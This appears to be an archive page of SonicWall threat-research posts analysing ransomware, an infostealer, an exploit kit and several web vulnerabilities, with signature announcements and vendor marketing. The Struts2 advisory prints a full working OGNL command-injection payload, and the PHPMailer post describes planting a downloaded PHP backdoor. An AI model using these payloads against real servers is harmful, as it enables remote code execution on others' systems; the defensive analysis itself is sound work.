Sage 2.2 updated with audio alert and reduced ransom (March 29th, 2017)

/in /by

The Sage Ransomware (covered in a previous SonicAlert) continues developement by cyber crimimals and has recently received a minor update. As usual this ransomware encrypts personal documents, images, databases, videos and other files rendering them unusable. As well as some refinements to its alert page it now uses the Windows built-in text-to-speech engine to play an audio alert. The audio alert informs the user of the infection and encryption of files. Additionally, the cost of decryption that had previously been $2000 USD has now been reduced to $800 USD.

Infection Cycle:

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • %SYSTEMROOT%!HELP_SOS.hta
  • %ALLUSERSPROFILE%Desktop!HELP_SOS.hta
  • %ALLUSERSPROFILE%Documents!HELP_SOS.hta
  • %APPDATA%f1.hta
  • %APPDATA%En3QVWV9.exe [Detected as GAV: Sage.A (Trojan)]
  • %APPDATA%MicrosoftSpeechFilesUserLexiconsSP_029A022514CA4689BAFB15AF07CD496A.dat
  • %USERPROFILE%Desktop!HELP_SOS.hta
  • %USERPROFILE%Local SettingsTempaV2.bmp
  • %USERPROFILE%My Documents!HELP_SOS.hta
  • %SYSTEM32%CatRoot2tmp.edb

The Trojan adds the following keys to the registry:

  • HKEY_CLASSES_ROOT.sage @ “sage.notice”
  • HKEY_CLASSES_ROOTsage.noticeDefaultIcon @ “%WinDir%system32shell32.dll,47”
  • HKEY_CLASSES_ROOTsage.noticeFriendlyTypeName @ “encrypted by SAGE”
  • HKEY_CLASSES_ROOTsage.noticeshellopencommand @ “mshta.exe “%APPDATA%f1.hta” “%1″”
  • HKEY_CURRENT_USERSoftwareMicrosoftSpeechVoices DefaultTokenId “HKEY_LOCAL_MACHINESOFTWAREMicrosoftSpeechVoicesTokensMSSam”
  • HKEY_CURRENT_USERSoftwareClasses.sage @ “sage.notice”
  • HKEY_CURRENT_USERSoftwareClasseshtafileDefaultIcon @ “%WinDir%system32shell32.dll,44”
  • HKEY_CURRENT_USERSoftwareClassessage.noticeDefaultIcon @ “%WinDir%system32shell32.dll,47”
  • HKEY_CURRENT_USERSoftwareClassessage.noticeFriendlyTypeName @ “encrypted by SAGE”
  • HKEY_CURRENT_USERSoftwareClassessage.noticeshellopencommand @ “mshta.exe “%APPDATA%f1.hta” “%1″”

aV2.bmp contains the following image that is displayed on the desktop background after infection:

!HELP_SOS.hta contains the following image that is displayed in the foreground:

Sage encrypts files and renames them with a .sage file extension. During encryption a key is sent to a remote server:

If there is no response from the key server, Sage attempts to make contact via UDP. It broadcasts the key to a variety of predefined IP addresses in the hope that it will make it to the key server:

Sage 2.2 now contains an audio alert that is played when the alert images are displayed. It is repeated every 5 minutes. Below is a capture of the audio:

Transcript:

      Attention... Attention... this is not a test. All you documents, databases and other
      important files were encrypted and Windows cannot restore them without special software.
      User action is required as soon as possible to recover the files.

      All you documents, databases and other important files were encrypted and Windows cannot
      restore them without special software. User action is required as soon as possible to
      recover the files.

The links given in !HELP_SOS.hta lead to the following web pages:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Sage.A (Trojan)
  • GAV: Sage.B (Trojan)

Apache Struts2 CVE-2017-5638 Vulnerability Follow-up (Mar 24, 2017)

/in /by

In previous SonicAlert, we warned a critical remote code execution vulnerability (CVE-2017-5638) (S2-045) targeting Apache Struts2. A remote attacker could exploit this vulnerability by sending certain crafted HTTP request with mal-formed Content-Type value. A successful attack could execute arbitrary command on the web server.

SonicWall customers are protected by following signatures:

  • IPS: 12656 – Apache Struts 2 Jakarta Remote Code Execution (S2-045) 1
  • IPS: 12660 – Apache Struts 2 Jakarta Remote Code Execution (S2-045) 2

While SonicWall Threat Research Team keeps watching CVE-2017-5638, we observed that since March 23, number of firewalls reporting CVE-2017-5638 exploits has nearly doubled.

In the meantime, number of incidents has surged 50 times comparing to average incidents in the past 2 weeks.

It is possible that attackers are testing and exploiting CVE-2017-5638 with newly developed (and more powerful) tools. SonicWall urges all our customers to review their firewall logs and make sure they are running latest version of Apache Struts2.

New variant of Atros InfoStealer actively spreading in the wild. (Mar 24, 2017)

/in /by

The Sonicwall Threats Research team observed reports of a new variant of Atros InfoStealer actively spreading in the wild.

Atros malware gathers confidential information from the computer such as login details, passwords; financial information sends it to its own C&C Server.

Infection Cycle:

The Malware adds the following files to the system:

  • %Userprofile%Application Dataoougw.exe

  • %Userprofile%Local SettingsApplication DataGDIPFONTCACHEV1.DAT

  • %Userprofile%All UsersApplication Data[ Computer Name ][ Date ].jpg [ Computer Screen Shot ]

The Malware adds the following keys to the Windows registry to ensure that the Trojan runs during startup:

  • HKLMSoftwareMicrosoftWindowsCurrentVersionRuncd482369-09b5-4f6f-929d-87c40c6be1bc

    • “%Userprofile%Application Dataoougw.exe”

Once the computer is compromised, the malware copies its own Executable files to Userprofile folder.

The malware’s goal is to collect as much data as possible; attacker’s profit based on the level of user information that is collected. Thereby more information collected leads to higher profits.

The malware also performs key logging, takes screen shots, and steals clipboard data from target user.

The Malware installs key Logger on the target machine and extracts passwords from the following web browsers:

  • Chrome

  • Firefox

  • Internet Explorer

  • Opera

  • Safari

The Malware saves data into Browsers.txt file and transfers to its own C&C server.

Command and Control (C&C) Traffic

Atros performs C&C communication over 80 port.

The malware sends your Computer information to its own C&C server via following format, here is an example:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Downloader.A_986 (Trojan)

Alma Ransomware delivered via RIG Exploit Kit (March 17, 2017)

/in /by

The Sonicwall Threat Research Team are still observing an steady increase of ransomware. A ransomware variant known as Alma has been observed being delivered via the RIG Exploit Kit to unsuspecting users. Exploit kits such as RIG are often hidden on compromised webservers and are used as part of a drive-by technique to infect visitors. Alma is yet another ransomware variant using the usual techniques for extorting money from infected users.

Infection Cycle:

The authors of the ransomware have tried to make the executable seem genuine by indicating that it was created by Apple Inc.:

The Trojan makes the following POST request to a hidden server on the TOR network:

The request is encoded using base64 encoding. The decoded message is as follows:

      p=OZZHTu0LitDed546XtOj1&a=Windows Defender&t=1489618916&r=hgshsgfh&o=6.3.9600&v=d42889198027beae49&s=2382&l=1033&e=vmnz&u=USER

OZZHTu0LitDed546XtOj1 is the encryption key used to encrypt/decrypt files. d42889198027beae49 is a unique user infection ID. The rest of the information contains data on any installed antivirus software, Windows version number, the current user and the file extension used for encrypted files.

Files with the following extensions are targeted for encryption:

      .1cd, .3ds, .3gp, .accdb, .ai, .ape, .asp, .aspx, .bc6, .bc7, .bmp, .cdr, .cer

      .cfg, .cfgx, .cpp, .cr2, .crt, .crw, .csr, .csv, .dbf, .dbx, .dcr, .dfx, .dib

      .djvu, .doc, .docm, .docx, .dwg, .dwt, .dxf, .dxg, .eps, .htm, .html, .ibank

      .indd, .jfif, .jpe, .jpeg, .jpg, .kdc, .kwm, .max, .md, .mdb, .mdf, .odb, .odc

      .odm, .odp, .ods, .odt, .orf, .p12, .p7b, .p7c, .pdf, .pef, .pem, .pfx, .php

      .pl, .png, .pps, .ppt, .pptm, .pptx, .psd, .pst, .pub, .pwm, .py, .qbb, .qbw

      .raw, .rtf, .sln, .sql, .sqlite, .svg, .tif, .tiff, .txt, .vcf, .wallet, .wpd

      .xls, .xlsm, .xlsx, .xml

Upon reverse engineering the executable, the read, encrypt, write and delete functions can been seen without much effort:

The following image is displayed onscreen, giving instructions on how to recover encrypted files. At the time of writing the server had been removed (possibly by authorities) from the TOR network.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: AlmaLocker.A (Trojan)

CeBIT 2017: Real-Time Breach Prevention with SonicWall, Your Partner in Cybersecurity

/0 Comments/in /by

Join SonicWall at CeBIT 2017 on the 20-24th of March, in Hannover, Germany.

With “Experience the Digital Transformation” as this year’s theme, IT Security will be at the forefront of the visitors’ agenda, alongside other leading-edge technologies, such as artificial intelligence, humanoid robots and applications of virtual reality. But security can’t be an afterthought! It’s at the core of everything organizations do. Without it, they can’t grow, can’t move forward and can’t innovate. Without effective security, too often, organizations default to inaction, to not moving forward. And they will have no choice but to say NO to their digital transformation.

The explosion of advanced threats is rendering legacy network security solutions obsolete. Ransomware, zero-day threats, encrypted malware and other attacks expose organizations to breaches that threaten business viability and compliance requirements. This creates the need for a new breed of network security solutions that deliver more than just breach detection. Organizations require breach prevention capable of handling threats delivered by any vehicle including web and email, over encrypted or unencrypted traffic, across any network including wired and wireless, and for not only PCs but tablets, smartphones and IoT devices.

As an exhibitor in Hall 6, Stand E03, SonicWall with five of its German partners – Data_Sec, Tarador, Die Netz-Werker, Pallas and Synexus – will demonstrate cutting-edge network security solutions that enable our customers to stay ahead of cybercriminals in the continually evolving cyber arms race, allowing them to embrace their digital transformation whilst meeting their compliance requirements.

Speaking of which, the General Data Protection Regulation – GDPR – goes into effect in May 2018. It will affect companies of all sizes, in all regions, and in all industries, who holds EU citizen personal information. Victims of a data breach when the GDPR goes into effect risk significant fine (up to 20 million euros or four percent of their global revenues), and loss of reputation, that could bring the business to its knees. So don’t put off early consideration of GDPR: the scale, complexity, cost and business criticality of GDPR means that it will take some a long time for most companies to achieve full compliance…Start now if you haven’t done so.

SonicWall’s on-site presentations (we will have more than 45 exciting presentations), demos (including live hacking sessions), and experts will empower you and your organization’s networks to overcome numerous crimes targeting weak spots in your network. You will definitely want to see a demo of our award-winning multi-engine sandbox, SonicWall Capture ATP, which scans network traffic to prevent zero-day and advanced threats. We will show how we can block unknown files until Capture reaches a verdict, which is made possible by a highly effective multi-engine sandbox. Near real-time verdicts are rendered by our highly efficient GRID cloud threat network. Our next-gen firewalls also detect malware using SSL or TLS encryption to cloak malicious behavior, C&C communication and exfiltration.

Because email is a constant target for attacks we will showcase our revolutionary technology for email security that now integrates with our award-winning Capture Advanced Threat Protection (ATP) Service. SonicWall’s Email Security solutions allow you to deploy a next-gen solution to protect email files, stop phishing and block ransomware. Don’t miss out the opportunity to speak to our experts, and learn how you can block spoofed email and zero-day attacks with our hosted service or our on premise enterprise email security solutions.

Today’s ever-growing number of connected devices by mobile workers and vendors requires organizations to rethink their needs for IoT security. SonicWall’s access security and network segmentation delivers the right level of access to your mobile workers and reduces the threat surface. Right network segmentation is required for critical business apps and data to ensure better protection. With our Secure Mobile Access solutions, you can define granular access policies, enforce multi-factor authentication and monitor all activities for compliance.

Start securing your digital transformation with SonicWall, Stand E03 in Hall 6, where you will be able to experience first-hand how SonicWall next-gen firewalls, access security and email security offer the power to be competitive and fearless.

We are looking forward to seeing you soon. Bis Bald as they say in Germany!

Before you go, be sure to download our threat report.

Download Threat Report

A new updated version of Terror Exploit Kit observed by SonicWall (March 13th, 2017)

/in /by

A new updated version of Terror Exploit Kit observed by SonicWall

Summary:

Terror exploit kit is a new exploit kit, observed in the wild from be
ginning this year. SonicWall Threat Research team has observed a new version of Terror exploit kit, which now has stolen code from both RIG and Sundown exploit kits. The landing page of Terror exploit kit consists of a JavaScript which seems to be stolen from RIG, followed by another script stolen from Sundown exploit kit. These stolen JavaScripts are followed by embedded flash exploits. There is no obfuscation seen in this exploit kit. Both the landing page and the payload are not encrypted.

Technical Details:

Below Figure shows the URL pattern of the landing page, exploits and payload of the observed Terror exploit kit version.

Figure 1: Terror EK URL patterns

 

Landing Page:

The Terror EK landing page contains 2 JavaScripts and 2 flash exploits embedded in it. Below is the image of the first JavaScript. The below code looks like the de-obfuscated RIG exploit kit, the sub function name inside function exp looks exactly the same.

Figure 2: Landing page JavaScript functions

 

Few strings found in the landing page are Il1Iu, Il1Ix, Il1Ica, Il1Ida, function exp(_url, _key), function ush(u, k), function hex(num, width), leakMem, function fire(), Function tRIGgerBug, which should help future classification of this variant.

Below is the image of the second JavaScript present in Terror EK landing page.

Figure 3: VBScript embedded in JavaScript

 

This JavaScript injects malicious VBScript into the DOM dynamically by using JavaScripts document.write method as shown in Figure 3. Similar technic is used in Sundown exploit kit. Injected VBScript is identified to be exploiting vulnerability mentioned in CVE-2016-0189.

Below is the image showing the two embedded flash exploits.

Figure 8: Malicious SWF Objects

This variant tries to infect the victims by exploiting vulnerabilities available in Adobe Flash player as shown in above Figure 8. We can observe that this kit launches two flash movies which are malicious exploits and the shellcode is passed to these exploits as an argument using FlashVars parameter, which is executed after successful exploitation. On execution of shellcode, the payload malware will be downloaded and installed onto the victims system.

During our analysis we observed the payload has capabilities to disable installed security products, steal credentials, open ports (listens for commands from remote server) and also acts as a Downloader.

Solution provided by SonicWall:

Having up to date Software will help in mitigating this exploit kit. SonicWall Threat Research team will keep on monitoring this exploit kit and its evolution to update signatures as required.

SonicWall Gateway AntiVirus provides protect
ion against this threat via the following signatures:

Payload: Downloader.A_973

Exploit: CVE-2015-5122.A_2, MalSWF

Landing Page: Terror_EK.LP

Critical Vulnerability on Apache Struts2

/in /by

A critical remote code execution vulnerability CVE-2017-5638 has been reported on Apache Struts2, affecting Struts 2.3.5-2.3.31 and Struts 2.5-2.5.10. A remote attacker could exploit this vulnerability by sending certain crafted HTTP request with mal-formed Content-Type value. A successful attack could execute arbitrary command on the web server.

As of Mar 6th, this vulnerability has been addressed in the Security Bulletin S2-045, and the exploit was already in-the-wild on MetaSploit.

The vulnerability is triggered by the OGNL expressions injected from the Content-Type header. When the Content-Type of a HTTP request is set to the following content, the command “whoami” will be executed: 

 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_me mberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.A ctionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xw ork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlU til.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoam i').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('wi n'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new jav a.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start( )).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream ())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros .flush())}

Details of the vulnerability:

The vulnerability is caused by a logic error when handling an unknown Content-Type header. During the exception handling, the JakartaMultiPartRequest.buildErrorMessage method used localizedTextUtil.findText method to process the request content, and the later one contains a feature that shouldn’t be supported here: search the OGNL expressions inside the request, and eventually execute them.

The JakartaMultiPartRequest.parse method will parse the HTTP request header. When an unknown Content-Type is passed in, it will call the buildErrorMessage method to handle it. (As the name indicated, it would generates an error message):


The buildErrorMessage will then call the method localizedTextUtil.findText to parse the message. The body of the message will be passed in the 4th parameter:

In the official patch, the buildErrorMessage was fixed for necessary filtering before calling findText.

In the findText method, the OGNL expressions will be parsed and executed.

We suggest the users with an effected version of Struts2 to update the patch as soon as possible. Also the SonicWall IPS team has developed the following signature to identify and stop the attacks:

IPS: 12656 – Apache Struts 2 Jakarta Remote Code Execution (S2-045)

CVE-2017-5638 incidents in last 6 months

References:

[1] https://github.com/rapid7/metasploit-framework/issues/8064
[2] https://github.com/apache/struts/commit/352306493971e7d5a756d61780d57a76eb1f519a
[3] https://dist.apache.org/repos/dist/release/struts/2.3.20.1/
[4] http://blog.nsfocus.net/apache-struts2-remote-code-execution-vulnerability-analysis-program/
[5] https://cwiki.apache.org/confluence/display/WW/S2-045

How To Own A Web Server By Writing An Email (Jan 4, 2017)

/in /by

PHPMailer allows website visitors to send emails to the website’s owners or admins. Recently, there was vulnerability discovered that allows remote attackers to execute code.

PHPMailer validates email addresses using RFC 3696. However, according to the specifications, blank spaces and double-quotes are allowed. By crafting an email address string containing blank spaces and double-quotes, an attacker can then inject code that would have PHPMailer’s mail() function call /usr/bin/sendmail differently.

Test Website

For our tests, we crafted a webpage using the following html form:

Fig. 1

The HTML code is shown as:

Fig. 2

While send_form_email.php is as follows:

Fig. 3

Running The Exploit

We attempt to exloit the vulnerability by typing in the following to the web page:

Fig. 4

This generates a file named phpcode.php in /var/www/html/cache/. Looking at the file, we will see that one line contains the php code we placed in the comments section:

Fig. 5

By entering the URL to the generated file, we will see the following in the browser:

Fig. 6

Owning

So far, we know the following:

  1. From Fig. 2, there is a limit to the number of characters we can send in the message.
  2. From Fig. 5, the injected code is placed in one line in the generated file.
  3. We cannot yet “execute” random code.

Basically, our next step would then require us to send code that is:

  1. Short enough to fit the character limit.
  2. Does not require line breaks.
  3. Allow us to have a means to “execute” code.

By using libcurl, we can have the web server download other files for us.

Fig. 7

The above, when executed, would download a file and save it as backdoor.php. Executing the generated phpcode.php file in the browser, we would see only the following:

Fig. 8

However, in the background, the web server is then instructed to download a file and save it as backdoor.php.

Going to backdoor.php, we see the following:

Fig. 9

This is basically a PHP backdoor we can use to execute instructions.

Prevention Methods:

A simple regular expression check can be used to verify the email address as follows:

Fig. 10

SonicWALL Threat Research Team has researched this vulnerability and have the following signatures in place to protect their customers:

  • WAF:9016 – PHP Injection Attack
  • WAF:9039 – PHP Injection Attack 2

CRN Recognizes SonicWall’s Steve Pataky as 2017 Channel Chief

/0 Comments/in /by

Steve PatakyI am honored to highlight my esteemed colleague, Steve Pataky, Vice President of Worldwide Sales at SonicWall, who was just named CRN Channel Chief – the Top 50 Most Influential Channel Chiefs of 2017. Steve not only brings with him more than 25 years of experience and an industry reputation for architecting and executing global channel and go-to-market strategies, but also a deep and genuine passion for helping partners succeed. He’s been a recipient of the CRN Channel Chiefs award for several years, and was among the magazine’s 50 Most Influential Channel Chiefs in 2014, 2015 and again this year.

CRN’s 50 Most Influential Channel Chiefs of 2017 are drawn from a larger group of Channel honorees that represent the elite members of the IT channel executives – “leaders who drive the channel agenda and evangelize the importance of the channel partnerships.”

2017 Channel Chief

These are exciting times for SonicWall and our Partners. As the newly independent SonicWall we are proudly declaring that we are once again 100% channel, 100% security, 100% of the time. We are so fortunate to have the most tenured, talented and loyal Partners and I know Steve, along with the entire company, feels a deep and abiding obligation to ensure this next generation of SonicWall always puts our Partners first in our strategies and our priorities.

To that end, Steve and our channel team have launched the SonicWall SecureFirst Partner Program worldwide to our thousands of valued SonicWall Partners. SecureFirst is designed to easily give partners access to our entire security portfolio and reward them for the value they bring to selling and supporting SonicWall solutions. We’re thrilled that SecureFirst is off to a extremely fast start. In the first 90 days:

  • SecureFirst program registrations reached over 9,000 Partners across 90 countries
  • SecureFirst registrations in North America exceeded 5,900 Partners
  • SecureFirst Deal Registrations have spiked 66% in North America since divestiture

We look forward to continue helping our partners work with their customers to successfully navigate the expanding landscape of advanced threats in the cyber security arms race. We’re actively driving an industry-leading product portfolio to help customers detect and prevent breaches delivered in any vehicle, in any package, across any network and on any device. In fact, our continued innovations around the SonicWall real time breach prevention platform recently won four awards at RSA 2017 including SC Magazine Trust Award for Best UTM Security Solution for our SonicWall TZ Firewall Series.

It’s clear that with Steve as our channel chief, backed by the full commitment and resource of SonicWall, we will continue to always put our Partners first, with SecureFirst.

WordPress Mobile App Native Plugin Vulnerability Leads to Web Site PWNage (Mar 03, 2017)

/in /by

The Mobile App Native Plugin for WordPress lets you turn your website into a mobile application in just a few minutes. Recently, there was a vulnerability discovered that allows attackers to execute remote code.

It turns out that the plugin does not:

  1. Require authentication for file uploads. Any user can upload any file, be it text, image or even executable.
  2. 2. Check if the uploaded file contains executable code.

Given the above, any user can simply upload a php file that allows for code execution. This is similar to the backdoor.php file shown in How To Own A Web Server By Writing An Email (Jan 4, 2017)

Once the backdoor.php has been successfully uploaded, the attacker can, then go to it and perform any malicious actions he or she wishes.

SonicWALL Threat Research Team has researched this vulnerability and have the following signatures in place to protect their customers:

  • WAF:9016 – PHP Injection Attack
  • WAF:9039 – PHP Injection Attack 2